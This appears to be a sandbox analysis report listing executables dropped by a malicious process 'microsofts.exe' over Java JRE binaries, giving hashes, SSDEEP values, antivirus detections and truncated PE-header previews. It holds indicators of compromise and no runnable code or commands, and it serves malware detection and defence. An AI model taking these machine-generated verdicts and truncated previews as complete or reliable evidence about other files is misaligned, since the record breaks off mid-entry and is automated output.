                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1212416
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1197219794391815
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:av1vvhXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:m1BsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:44EA03315FED286C52AD490E9857FE6F
                                                                                                                                                                                                                                                                                                          SHA1:D2365AF2A4F2E9EAC997467C6D51FF7C94A5243F
                                                                                                                                                                                                                                                                                                          SHA-256:874A51567E4C4779E3B1CCB73406D157C9CEEAE24087B83228FE244591BEF1CD
                                                                                                                                                                                                                                                                                                          SHA-512:3FE0DFBAC481665C2E1BE5D2A8A03107E86047BB382287204E6EAAF3ACDB9F742967A46AE8F450A4EF59B2E3A363B082168D02B971FB604E6ED2A9BF535FBFFC
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.........................................................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1375232
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.446813086644456
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:FnU/h/4KvsqjnhMgeiCl7G0nehbGZpbD:FU/VTDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:6A3565DE9FF0A7F882F4965F07C6DFD4
                                                                                                                                                                                                                                                                                                          SHA1:8714310743AB04CDC1F728B249FED601A1D2263A
                                                                                                                                                                                                                                                                                                          SHA-256:ADF8455891AA5F068152B97F58618E096DA7E827745533BBB5459B3A28913440
                                                                                                                                                                                                                                                                                                          SHA-512:AB37C2E35305E239C9BE108252B2D941207D7DE0E1653FFDFA42079036DB0BEC2169126DBB74DFE1335CAE1F1D5182230975BF3EF26132C99030B4C7F5247F20
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......Z........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1513984
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.483733037503609
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:Xx71iBLZ05jNTmJWExIsqjnhMgeiCl7G0nehbGZpbD:XxhiHIjNg0Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:AA268AD35864F68A79020AAF20424DE2
                                                                                                                                                                                                                                                                                                          SHA1:201AE5A1DCEB793F76DE4E70CD11C506EA0D2B49
                                                                                                                                                                                                                                                                                                          SHA-256:CD7CE2CFF21D90A7B6708C355B989BF1A9A9B71768282967527BC0992E29EE22
                                                                                                                                                                                                                                                                                                          SHA-512:5B985DD612C17272BE03E1DB860FEF29B5FB58BA90F2474BF9896470AAE2C03357F6812B14F072F4A834E9F48559F75841E9C820D6F8C9283FB9FB53135E0583
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..................................c..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1142272
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0328761367329236
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:G3rdXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:2BsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:2E281A2790F50B7BE42A841FDE952B2D
                                                                                                                                                                                                                                                                                                          SHA1:C81FF169B8C4E3347159E03F771CB2400C0DD124
                                                                                                                                                                                                                                                                                                          SHA-256:B42B165DBEB3189A5CE6E9A5DA03D7A545C9EFC1D12DECEDFBC421566664F2AE
                                                                                                                                                                                                                                                                                                          SHA-512:DD52DED822D61B8EA461A3D5873CA00326E2BBCF66F5055008A0A8B61EC4B1A2EC9C048BB3FE6E00D5ADD845DB5421C313EA492A65F3466ECBB28E3BB6051151
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................S4.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1242112
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.172664079442345
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:AYdP/iXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FdP/isqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:7D163A49BBC83ACB2A5FB552826F1615
                                                                                                                                                                                                                                                                                                          SHA1:96DBEF3FDAC6D8E3B6ED3E483F735D24688CE351
                                                                                                                                                                                                                                                                                                          SHA-256:FC6842619C85BFF48CC03225EBA420BD582A4F781AE5C5DA51E70138535329E3
                                                                                                                                                                                                                                                                                                          SHA-512:04BD27FE4CCB8A44028B1100F7F1B31DFE0A176C5D51A851FFF1159E7F073AE0831FCDBAB4DE443EA6448C09758AB1F0DA63C1549EDF9A086114B4DFD28B7274
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P......M...........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1142272
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.032898076759274
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:ly51Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:APsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:B81836F50F7510ACC96057B95BFE2DF7
                                                                                                                                                                                                                                                                                                          SHA1:C260D5678F7B9547BCFC8E373C631DF7C7B168EB
                                                                                                                                                                                                                                                                                                          SHA-256:E0FB053FF381E77CFFB1687C20E1C3B29472D1494FD15FEE9912A95B2D6C1C58
                                                                                                                                                                                                                                                                                                          SHA-512:AB574B9569899A9331769DFC7E7BB5A54DF06171C74CA27E94F8071EA16825F9A69E1C0E88C1AC6634A319045DCCF4AD990C8ED9220223B3910F3D5EB4B94368
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1142272
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.03297043363449
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:WKltXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:XjsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:071E3B7ED85220C418D74395D50E5A8C
                                                                                                                                                                                                                                                                                                          SHA1:B0102ECB3DA80E8E9D0EB1D98C5F56E1DAB9DAB0
                                                                                                                                                                                                                                                                                                          SHA-256:B63DF8E7F96DFB55D8C594571955CEBB20F66C785544B4217C08B79C05E09A06
                                                                                                                                                                                                                                                                                                          SHA-512:2D2557999B9530DE9D71C96081FB64FDD1FE4248CE3DAEA94BECBE3C3ED4A313D075D815912646AA3D5492485469886517167FF1101B0DC0C88FED36AE17F5B1
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................O.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1142272
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.032970013945113
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:7iltXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+jsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:E2BADD23AFAAA7AE67B0829B141D386B
                                                                                                                                                                                                                                                                                                          SHA1:C424D6FC9B3734E14AE48B3E71ADBB178A60CE49
                                                                                                                                                                                                                                                                                                          SHA-256:4A858BF005B3D049F8831278C123B44102B08FD151ABE3AD31C3820D46904653
                                                                                                                                                                                                                                                                                                          SHA-512:E0A853F4686B51DF8D2D3FCB12DBB94126BFC31E1489549778C576B13D2F4B0D7339ABD6BDDD9072C387E1A907A06D60C74AC70AF3A917CFE29594F31A69D763
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1142272
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.032944841139046
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:eTmNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IgsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:5D4BB306A1BD8324335DD5F5018275C7
                                                                                                                                                                                                                                                                                                          SHA1:B79114CC267719ED967CDA03F5E9C6684E5223E7
                                                                                                                                                                                                                                                                                                          SHA-256:3899B3B63CF562DBFA8986ECFE39DCB928CB06FB5E206A9C449DA8F18B1CB2C9
                                                                                                                                                                                                                                                                                                          SHA-512:719F7B0C9CF0DC623918008D39C325D90A35573D51C36E9F3C011C42281FB193AA0BD59EEF279AE0B28783F6F71F149C50D49EDB883B392B8A47FE74698C7E13
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................q........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1142272
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.033858899174145
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:qamhXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9csqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:AFED17A3F940506FED83DEBE0CBC266C
                                                                                                                                                                                                                                                                                                          SHA1:6BA3826B9B668DAF28B143D5D0ABEFAB04690F35
                                                                                                                                                                                                                                                                                                          SHA-256:7A0EFB980BD6759FD108BC94F6B061433842186DE27DC5BABEC965297197C239
                                                                                                                                                                                                                                                                                                          SHA-512:95DEFEB1AEA5B5EDD700943AA72E2C71E9638515329BD8F673CD003AE4B7D225BFC3EC2E7FAB207823AE9F8D7F76514198E529C2A8518AEF31E038FE2850EA63
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................jN......................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1142272
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.032908399634037
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:WQ51Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:dXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:F9B909BD519F43D01E6CDA6281550963
                                                                                                                                                                                                                                                                                                          SHA1:D9F32DFD566A43DD0AB62C2BA35AB9C598C071D9
                                                                                                                                                                                                                                                                                                          SHA-256:A60E2B903AB1DE1AB9C9157D5EA86230D93EE7C775A13438E6E66C86C1CC5199
                                                                                                                                                                                                                                                                                                          SHA-512:102E1E493DCE27E4F3565C405EDEAF8A0889364FDE8C56CF04E52FA48A5E1636D48BB65E21219CD0F63C7429702BD1B2853C9E209F6FDE6C51CF4144A82F5EFE
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................$.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1142272
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.03296070622845
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:kV/tXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:gFsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:ECA9FAFEBA9E875BB032B4908994298B
                                                                                                                                                                                                                                                                                                          SHA1:08F7C79AFAF25A8BF3DBE388C10920F6965E17E1
                                                                                                                                                                                                                                                                                                          SHA-256:B32C10C36BB93DA33FFDC2387C7BF1F96462DB012FD81B9F589696C2DA547158
                                                                                                                                                                                                                                                                                                          SHA-512:B155F95E2B47224151733D8E92C246F483A0DEFC253BFF5693D2CCEE93AA5EBC6CF10E654688BC0B07C15E5AAF601D7E688E8498AC43B67B3DDB4FE221F43A38
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................d........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1142272
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0328650197374465
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:bZm9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:dgsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:02DCE88A873068D07DD78300F7C94B65
                                                                                                                                                                                                                                                                                                          SHA1:F2ADE0B2037EBDE8E1ABD6F2D1531C13AE794C80
                                                                                                                                                                                                                                                                                                          SHA-256:8891F9790A22120CEFC5AA87FE671E6DA27381520CE1A2EB3EA8A8D19EE96C72
                                                                                                                                                                                                                                                                                                          SHA-512:B2BF87D6F28D23A01548F4C97E8967C1FA6B5AEC6FA637410D8E47C547C262059C272079C5341424D6FB156EE1325F2B6F964DF6D53C3AB9CCA2D4766703FC09
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................B'.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1142272
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.032905779661063
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:9eSdXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:sosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:2D50D766283B726703613C1722E60FD0
                                                                                                                                                                                                                                                                                                          SHA1:D9347AE262771C71041ED95DEC774A977A3A0489
                                                                                                                                                                                                                                                                                                          SHA-256:33EE823CEB8BB7776E860ED74A432943D6F05545AA7F55A17165B28A411BF5E2
                                                                                                                                                                                                                                                                                                          SHA-512:6EF35B6033DF7F20BFCEEAE007165F1ED5FE29948C6B81BDB6C84598CE3E1CD8FDA4477A8423087089A0EF721052DAF3720D981EF3E5854BAF9D2358B8185493
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1142272
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.032976797431892
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:b5/lXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9NsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:FF4C123FBEC6BC7E5BD9DC061CCEC75D
                                                                                                                                                                                                                                                                                                          SHA1:23BB69CBE7CEB14892F13D2BBC078530C9196734
                                                                                                                                                                                                                                                                                                          SHA-256:F65B8D2D3A65C1CFD825BCAF420219C4FDC6BBA6457F03855517CFFE5AE4ABD4
                                                                                                                                                                                                                                                                                                          SHA-512:BFB1C5EA88B68A1594496E1ADE3E5B2329A622D14CBA25C5CD403FD9736D62232EF225C09583B84B5E9248B0A6D519EADFB88EF7122A0A88B7C3F99A25407C17
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1202688
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.098046297397434
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:z7jXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:z7jsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:214C17D89D49B96D7EFC5A14617B383E
                                                                                                                                                                                                                                                                                                          SHA1:813B8F59C52B51C01410095526BC21F31F3328DD
